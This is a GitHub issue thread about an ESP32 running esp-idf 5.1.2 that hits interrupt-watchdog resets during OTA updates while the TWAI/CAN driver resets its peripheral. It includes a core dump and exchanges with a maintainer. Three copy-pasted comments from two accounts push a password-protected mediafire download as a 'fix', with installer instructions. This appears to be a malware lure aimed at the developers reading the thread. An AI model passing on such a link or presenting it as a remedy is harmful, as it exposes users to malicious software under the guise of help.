### ISSUE TITLE
IWDT triggered during OTA

### ISSUE THREAD

**Issue by michaelpontillas** [espressif/esp-idf#14450]
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### IDF version.

esp-idf-5.1.2

### Espressif SoC revision.

ESP32

### Operating System used.

Windows

### How did you build your project?

Command line with idf.py

### If you are using Windows, please specify command line type.

CMD

### Development Kit.

Custom Board

### Power Supply used.

External 3.3V

### What is the expected behavior?

OTA update must be finished without interruption or reset.

### What is the actual behavior?

Device intermittently resets due to interrupt watchdog when OTA progress reaches 80 -90%.

### Steps to reproduce.

N/A

### Debug Logs.

```plain
==================== ESP32 CORE DUMP START ====================

Crashed task handle: 0x3ffef9a4, name: 'Û_OTAU', GDB name: 'process 1073674660'

================== CURRENT THREAD REGISTERS ===================
exccause 0x47 (CacheError)
excvaddr 0x0
epc1 0x0
epc2 0x0
epc3 0x0
epc4 0x0
epc5 0x0
epc6 0x0
epc7 0x0
eps2 0x0
eps3 0x0
eps4 0x0
eps5 0x0
eps6 0x0
eps7 0x0
pc 0x401eb0d8 0x401eb0d8 <periph_ll_reset>
lbeg 0x4000c2e0 1073791712
lend 0x4000c2f6 1073791734
lcount 0xffffffff 4294967295
sar 0x20 32
ps 0x60025 393253
threadptr <unavailable>
br <unavailable>
scompare1 <unavailable>
acclo <unavailable>
acchi <unavailable>
m0 <unavailable>
m1 <unavailable>
m2 <unavailable>
m3 <unavailable>
expstate <unavailable>
f64r_lo <unavailable>
f64r_hi <unavailable>
f64s <unavailable>
fcr <unavailable>
fsr <unavailable>
a0 0x8008d10c -2146905844
a1 0x3ffc0240 1073480256
a2 0x16 22
a3 0xffffffff -1
a4 0x800978cd -2146862899
a5 0x3fff24a0 1073685664
a6 0x3fff2510 1073685776
a7 0x3fff24bc 1073685692
a8 0x8009276a -2146883734
a9 0x3ffc0220 1073480224
a10 0x16 22
a11 0xffffffff -1
a12 0x1 1
a13 0x0 0
a14 0x2 2
a15 0x2 2

==================== CURRENT THREAD STACK =====================
#0 periph_ll_reset (periph=PERIPH_TWAI_MODULE) at C:/projects/esp/esp-idf/v5.1.2/components/hal/esp32/include/hal/clk_gate_ll.h:244
#1 0x4009276a in periph_module_reset (periph=PERIPH_TWAI_MODULE) at C:/projects/esp/esp-idf/v5.1.2/components/esp_hw_support/periph_ctrl.c:46
#2 0x4008d10c in twai_intr_handler_main (arg=<optimized out>) at C:/projects/esp/esp-idf/v5.1.2/components/driver/twai/twai.c:221
#3 0x40082958 in shared_intr_isr (arg=<optimized out>) at C:/projects/esp/esp-idf/v5.1.2/components/esp_hw_support/intr_alloc.c:436
#4 0x400831b4 in _xt_lowint1 () at C:/projects/esp/esp-idf/v5.1.2/components/freertos/FreeRTOS-Kernel/portable/xtensa\xtensa_vectors.S:1240
#5 0x4000c050 in ?? ()
#6 0x4008e8f8 in delay_us (arg=0x3ffc1790 <main_flash_arg>, us=20) at C:/projects/esp/esp-idf/v5.1.2/components/spi_flash/spi_flash_os_func_app.c:177
#7 0x4009dfb4 in spi_flash_chip_generic_wait_idle (chip=0x3ffc1720 <default_chip>, timeout_us=594281) at C:/projects/esp/esp-idf/v5.1.2/components/spi_flash/spi_flash_chip_generic.c:471
#8 0x4009e20a in spi_flash_chip_winbond_erase_sector (chip=0x3ffc1720 <default_chip>, start_address=<optimized out>) at C:/projects/esp/esp-idf/v5.1.2/components/spi_flash/spi_flash_chip_winbond.c:118
#9 0x4008e17c in esp_flash_erase_region (chip=<optimized out>, start=6135808, len=4096) at C:/projects/esp/esp-idf/v5.1.2/components/spi_flash/esp_flash_api.c:673
#10 0x4013868a in esp_partition_erase_range (partition=0x3ffb7270, offset=1875968, size=4096) at C:/projects/esp/esp-idf/v5.1.2/components/esp_partition/partition_target.c:134
#11 0x40138a80 in esp_ota_write (handle=<optimized out>, data=0x3ffffbc0, size=1024) at C:/projects/esp/esp-idf/v5.1.2/components/app_update/esp_ota_ops.c:208
#12 0x4016d372 in _ota_write (https_ota_handle=0x3ffee650, buffer=0x3ffffbc0, buf_len=1024) at C:/projects/esp/esp-idf/v5.1.2/components/esp_https_ota/src/esp_https_ota.c:231
#13 0x4016d8b0 in esp_https_ota_perform (https_ota_handle=0x3ffee650) at C:/projects/esp/esp-idf/v5.1.2/components/esp_https_ota/src/esp_https_ota.c:565
#14 0x40104d60 in unity_https_ota (config=<optimized out>, expected_version=<optimized out>) at C:/projects/unity-firmware/unity-firmware-dev/components/otau/src/OTAU.c:891
#15 0x40104f16 in FirmwareUpgradeTask (pvParameter=0x3fff0c08) at C:/projects/unity-firmware/unity-firmware-dev/components/otau/src/OTAU.c:665
#16 0x40096135 in vPortTaskWrapper (pxCode=0x40104e8c <FirmwareUpgradeTask>, pvParameters=0x3fff0c08) at C:/projects/esp/esp-idf/v5.1.2/components/freertos/FreeRTOS-Kernel/portable/xtensa/port.c:162

======================== THREADS INFO =========================
Id Target Id Frame
* 1 process 1073674660 periph_ll_reset (periph=PERIPH_TWAI_MODULE) at C:/projects/esp/esp-idf/v5.1.2/components/hal/esp32/include/hal/clk_gate_ll.h:244
2 process 1073446020 0x400926d2 in esp_cpu_wait_for_intr () at C:/projects/esp/esp-idf/v5.1.2/components/esp_hw_support/cpu.c:121
3 process 1073626972 0x4000bff0 in ?? ()
4 process 1073468492 0x4008ea64 in esp_crosscore_int_send_yield (core_id=0) at C:/projects/esp/esp-idf/v5.1.2/components/esp_system/crosscore_int.c:158
5 process 1073446392 0x4008ea64 in esp_crosscore_int_send_yield (core_id=0) at C:/projects/esp/esp-idf/v5.1.2/components/esp_system/crosscore_int.c:158
6 process 1073576188 0x4008ea64 in esp_crosscore_int_send_yield (core_id=0) at C:/projects/esp/esp-idf/v5.1.2/components/esp_system/crosscore_int.c:158
7 process 1073630932 0x4008ea64 in esp_crosscore_int_send_yield (core_id=0) at C:/projects/esp/esp-idf/v5.1.2/components/esp_system/crosscore_int.c:158
8 process 1073623480 0x4008ea64 in esp_crosscore_int_send_yield (core_id=0) at C:/projects/esp/esp-idf/v5.1.2/components/esp_system/crosscore_int.c:158
9 process 1073554260 0x4008ea64 in esp_crosscore_int_send_yield (core_id=0) at C:/projects/esp/esp-idf/v5.1.2/components/esp_system/crosscore_int.c:158
10 process 1073618992 0x4008ea64 in esp_crosscore_int_send_yield (core_id=0) at C:/projects/esp/esp-idf/v5.1.2/components/esp_system/crosscore_int.c:158
11 process 1073438244 0x4008ea64 in esp_crosscore_int_send_yield (core_id=0) at C:/projects/esp/esp-idf/v5.1.2/components/esp_system/crosscore_int.c:158
12 process 1073442456 0x4000bff0 in ?? ()
13 process 1073467744 0x4008ea64 in esp_crosscore_int_send_yield (core_id=0) at C:/projects/esp/esp-idf/v5.1.2/components/esp_system/crosscore_int.c:158


TCB NAME PRIO C/B STACK USED/FREE
---------- ---------------- -------- ----------------
0x3ffef9a4 Û_OTAU 3/3 1120/5004
0x3ffb7c84 IDLE 0/0 416/1104
0x3ffe3f5c Û_Lin_Controll 8/8 928/2064
0x3ffbd44c Û_Printf 10/10 480/2516
0x3ffb7df8 Tmr Svc 11/11 448/3544
0x3ffd78fc tiT 18/18 544/4056
0x3ffe4ed4 mqtt_task 5/5 896/4096
0x3ffe31b8 Û_CAN_DriverTx 7/7 528/3564
0x3ffd2354 Û_EvtProc 8/8 496/5488
0x3ffe2030 Û_CAN_DriverRx 6/6 624/3460
0x3ffb5e24 wifi 23/23 496/6148
0x3ffb6e98 esp_timer 22/22 432/3648
0x3ffbd160 sys_evt 20/20 528/4072

==================== THREAD 1 (TCB: 0x3ffef9a4, name: 'Û_OTAU') =====================
#0 periph_ll_reset (periph=PERIPH_TWAI_MODULE) at C:/projects/esp/esp-idf/v5.1.2/components/hal/esp32/include/hal/clk_gate_ll.h:244
#1 0x4009276a in periph_module_reset (periph=PERIPH_TWAI_MODULE) at C:/projects/esp/esp-idf/v5.1.2/components/esp_hw_support/periph_ctrl.c:46
#2 0x4008d10c in twai_intr_handler_main (arg=<optimized out>) at C:/projects/esp/esp-idf/v5.1.2/components/driver/twai/twai.c:221
#3 0x40082958 in shared_intr_isr (arg=<optimized out>) at C:/projects/esp/esp-idf/v5.1.2/components/esp_hw_support/intr_alloc.c:436
#4 0x400831b4 in _xt_lowint1 () at C:/projects/esp/esp-idf/v5.1.2/components/freertos/FreeRTOS-Kernel/portable/xtensa\xtensa_vectors.S:1240
#5 0x4000c050 in ?? ()
#6 0x4008e8f8 in delay_us (arg=0x3ffc1790 <main_flash_arg>, us=20) at C:/projects/esp/esp-idf/v5.1.2/components/spi_flash/spi_flash_os_func_app.c:177
#7 0x4009dfb4 in spi_flash_chip_generic_wait_idle (chip=0x3ffc1720 <default_chip>, timeout_us=594281) at C:/projects/esp/esp-idf/v5.1.2/components/spi_flash/spi_flash_chip_generic.c:471
#8 0x4009e20a in spi_flash_chip_winbond_erase_sector (chip=0x3ffc1720 <default_chip>, start_address=<optimized out>) at C:/projects/esp/esp-idf/v5.1.2/components/spi_flash/spi_flash_chip_winbond.c:118
#9 0x4008e17c in esp_flash_erase_region (chip=<optimized out>, start=6135808, len=4096) at C:/projects/esp/esp-idf/v5.1.2/components/spi_flash/esp_flash_api.c:673
#10 0x4013868a in esp_partition_erase_range (partition=0x3ffb7270, offset=1875968, size=4096) at C:/projects/esp/esp-idf/v5.1.2/components/esp_partition/partition_target.c:134
#11 0x40138a80 in esp_ota_write (handle=<optimized out>, data=0x3ffffbc0, size=1024) at C:/projects/esp/esp-idf/v5.1.2/components/app_update/esp_ota_ops.c:208
#12 0x4016d372 in _ota_write (https_ota_handle=0x3ffee650, buffer=0x3ffffbc0, buf_len=1024) at C:/projects/esp/esp-idf/v5.1.2/components/esp_https_ota/src/esp_https_ota.c:231
#13 0x4016d8b0 in esp_https_ota_perform (https_ota_handle=0x3ffee650) at C:/projects/esp/esp-idf/v5.1.2/components/esp_https_ota/src/esp_https_ota.c:565
#14 0x40104d60 in unity_https_ota (config=<optimized out>, expected_version=<optimized out>) at C:/projects/unity-firmware/unity-firmware-dev/components/otau/src/OTAU.c:891
#15 0x40104f16 in FirmwareUpgradeTask (pvParameter=0x3fff0c08) at C:/projects/unity-firmware/unity-firmware-dev/components/otau/src/OTAU.c:665
#16 0x40096135 in vPortTaskWrapper (pxCode=0x40104e8c <FirmwareUpgradeTask>, pvParameters=0x3fff0c08) at C:/projects/esp/esp-idf/v5.1.2/components/freertos/FreeRTOS-Kernel/portable/xtensa/port.c:162
```

### More Information.

I'm getting intermittent Interrupt watchdog resets when OTA progress reaches 80 -90%.

Environment:
ESP32
esp-idf v5.1.2
8 devices connected over CAN bus and WiFi

I enabled core dump but most of the time the core dump image is not generated. However, I was able get it once. see below.

It appears that the TWAI peripheral gets reset while the flash is being erased.
The stack dump points to line 221 in the twai.c which is the workaround for the twai errata issue. 

#if defined(CONFIG_TWAI_ERRATA_FIX_RX_FRAME_INVALID) || defined(CONFIG_TWAI_ERRATA_FIX_RX_FIFO_CORRUPT)
if (events & TWAI_HAL_EVENT_NEED_PERIPH_RESET) {
twai_hal_prepare_for_reset(&twai_context);
periph_module_reset(p_twai_obj->module);
twai_hal_recover_from_reset(&twai_context);
p_twai_obj->rx_missed_count += twai_hal_get_reset_lost_rx_cnt(&twai_context);
twai_alert_handler(TWAI_ALERT_PERIPH_RESET, &alert_req);
}
#endif

I think the issue happens when the update reaches 80-90% because some devices are already finish with the ota update and then resets which causes bus error frames although I tried to avoid this by placing the CAN transceiver to Standby before the reset to disconnect it from the bus.

- Was this issue already reported and fix in the later esp-idf versions?

- I'm also interested why the core dump is not generated most of time. I tested by placing an while loop inside the isr to force iwdt and a core dump is generated.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wanckl** [comment]
@michaelpontillas 

one note is, if `TWAI ISR is in IRAM`, it designed for continue work during OTA, if not required, don't need place twai in iram, then it's interrupt will be disabled befor OTA

**Comment by michaelpontillas** [comment]
Hi,

Thank you for looking into this.

TWAI ISR needs to be in IRAM because the OTA runs over CAN as well.
Was the IWDT caused by TWAI ISR being in IRAM?

Regards,

Michael

**Comment by wanckl** [comment]
@michaelpontillas 
> IWDT caused by TWAI ISR being in IRAM    

no.

then, another may not root but related issue can be https://github.com/espressif/esp-idf/issues/14548#issuecomment-2382455339, you can have a try.

**Comment by michaelpontillas** [comment]
@wanckl 

Had a similar issue where bus error frames were reported due to devices resetting i.e after ota update. The root cause was that the TXD line is held low at reset (depends on which pin the TXD is mapped to) while the CAN transceiver stays in normal mode. I fixed the issue by setting the CAN transceiver to standby mode to disable the transmitter.

**Comment by wanckl** [comment]
@michaelpontillas 
bus error issue is fixed by 460233e on master, and by c032520 on 5.1

is your issue fixed?

**Comment by michaelpontillas** [comment]
Hi,

Not fixed yet.

-Michael
